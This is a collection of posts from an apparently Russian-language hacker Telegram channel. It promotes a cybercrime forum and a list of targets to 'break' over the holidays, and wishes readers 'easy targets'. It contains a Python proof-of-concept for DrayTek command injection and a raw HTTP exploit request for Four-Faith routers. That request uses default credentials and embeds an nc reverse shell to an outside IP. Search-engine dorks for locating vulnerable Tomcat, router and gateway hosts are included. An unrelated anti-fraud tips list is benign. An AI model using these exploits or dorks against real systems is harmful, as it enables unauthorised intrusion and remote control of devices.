Кого поиметь поломать на праздниках :)))
Взято тутъ platshit.com
копия https://pastebin.com/dceH4yXP
оригинал https://docs.google.com/spreadsheets/d/1z_z4F8JF5W_F2k3vf_tURif6wFYzNQ2dXmMB-8h1X9M/edit?gid=126673316#gid=126673316
Оригинал и исходники на XSS.IS
А ты уже с нами!!!
I’m watching you! How to spy Windows users via MS UIA
Новый метод слежения за пользователями. Вперед на вооружение армии #кибершпионов
POC
#windows #malware #spyware
LitterBox
Sandbox approach for malware developers and red teamers to test payloads against detection mechanisms before deployment.
КОНКУРС СТАТЕЙ #10. Призовой фонд 20.000$ на XSS.IS
Гвозди в крышку гроба Telegram: Подмена и Блокировка контента.
(Не) очередная статья о том, почему Telegram не стоит использовать НИ-ДЛЯ-ЧЕ-ГО кроме переписунек с друзьями.
CVE-2024-12987: DrayTek Gateways Remote Command Injection
PoC:
import socket
import socks
def send_http_request(host_ip, host_port, request):
socket.socket = socks.socksocket
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(10)
s.connect((host_ip, host_port))
request = bytes.fromhex(request.decode())
s.sendall(request)
print("HTTP request sent:")
print(request)
response = b""
while True:
data = s.recv(4096)
if not data:
break
response += data
return response.decode('utf-8', errors='replace')
except Exception as e:
print("An error occurred:", e)
if __name__ == "__main__":
host = '<TARGET_IP>'
port = '<TARGET_PORT>'
request_apmcfgupload_pwd_binary = b'474554202F6367692D62696E2F6D61696E66756E6374696F6E2E6367692F61706D63666775706C6F61643F73657373696F6E3D7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830B42535322463253532246370776420485454502F312E300D0A0D0A'
response = send_http_request(host, port, request_apmcfgupload_pwd_binary)
print("HTTP response received:")
print(response)
FOFA: app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"Читать полностью…
ZoomEye Dork: app="DrayTek Vigor 300B broadband router httpd" || app="DrayTek Vigor2960 router httpd"
❄️👽❄️ От всей души поздравляем вас с наступающим 2025 годом!
👽 Желаем меньше инцидентов и детектов, но больше удачных проектов и легких таргетов. Пусть ваши системы всегда остаются крепкими, как Русский дух, а пароли – сложными, как политическая обстановка в мире.
С почтением, 🦊.
Инструкция по противодействию мошенникам:1. Если любой звонок с незнакомого номера идёт через мессенджер - сразу сбрасывать. Не думая. Кем бы ни представлялись. Повторюсь. Сразу нахуй
2. Звонок на телефон может быть с подменой номера. Там будет номер хоть Администрации Президента. Не смотрите на номер. А если номер вообще не знакомый, то зачем вам его снимать (если не ждёте звонок от условного курьера).
3. Если с вами пытается говорить сотрудник любого, подчеркиваю, ЛЮБОГО органа власти уровня МВД, ФСБ, Налоговой и тэ дэ, то сразу предложите им общаться в "установленном Законом порядке". Звонок по телефону им не является. Если они отвечают херь, то сразу отправляйте лесом.
4. ЦБ не звонит гражданам. Повторюсь, НЕ ЗВОНИТ. С госуслугами аналогично.
5. Да, банки звонят клиентам. Но если вы их пошлёте нахер, то ничего не произойдёт. Они найдут способ, как с вами связаться, если что-то срочное (а такого нет).
6. НИКОМУ, НИКОМУ не говорите коды из СМС. Даже жене/мужу/детям/коту (ладно, коту можно).
7. Если вам кто-то говорит взять кредит - сразу посылайте. Без вариантов. Даже если это реклама
8. НИКТО И НИКОГДА не из мошенников не попросит переводить деньги на "безопасный счёт". Да на любой счёт не попросят.
9. Если вы считаете, что ФСБ предлагает по телефону поучаствовать в "спецоперации", то вы - долбодятел.
10. Да, в жизни всякое бывает. Люди попадаются в лапы мошенников. Но когда вам обещают вернуть деньги, если вы совершите теракт, то помните, что сроки там прям сразу огромные. Кем бы ни представлялся абонент на другой стороне трубки. Не совершайте глупостей. Вам НИЧЕГО не вернут.
Да, есть ещё много вариантов, и все, кто читает канал, их знают, но перешлите всем тем, кто из ваших родственников/знакомых этого не знают! Внесём свою маленькую лепту.
P.S. Если вы чувствуете, что разговор какой-то непонятный, то позовите рядом кого угодно. Шанс не попасть в лапы мошенников возрастает на порядок!
CVE-2024-50379/CVE-2024-56337 : Apache Tomcat RCE
Query:
HUNTER :/product.name="Apache Tomcat"
FOFA : product="Apache-Tomcat"
SHODAN : product:"Apache-Tomcat"
This vulnerability affects a wide range of Tomcat versions, including 11.0.0-M1 to 11.0.1, 10.1.0-M1 to 10.1.33, and 9.0.0.M1 to 9.0.97.
#1N73LL1G3NC3
CVE-2024-49112
A critical vulnerability in Windows LDAP client that according to Microsoft allows remote code execution. This exploit leverages the vulnerability to crash target Windows Server systems by interacting with their Netlogon Remote Protocol (NRPC), and LDAP client.
Blog: https://securityonline.info/poc-exploit-released-for-zero-click-vulnerability-cve-2024-49112-in-windows/
Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild
The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection, by sending a specially crafted POST request containing malicious commands embedded within the adj_time_year parameter.
POC:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time
HUNTER :/product.name="FourFaithRouter"Читать полностью…
FOFA:product="Four_Faith-Products"
ZoomEye Dork: (app="Four Faith Router"&&"F3x36") || (app="Four Faith Router"&&"F3x24")
Pryx из Hellcat Ransomware group слегка разокровенничался 🦊
Читать полностью…
PoC Exploit for CVE-2024-30085: Windows Elevation of Privilege Vulnerability
#1N73LL1G3NC3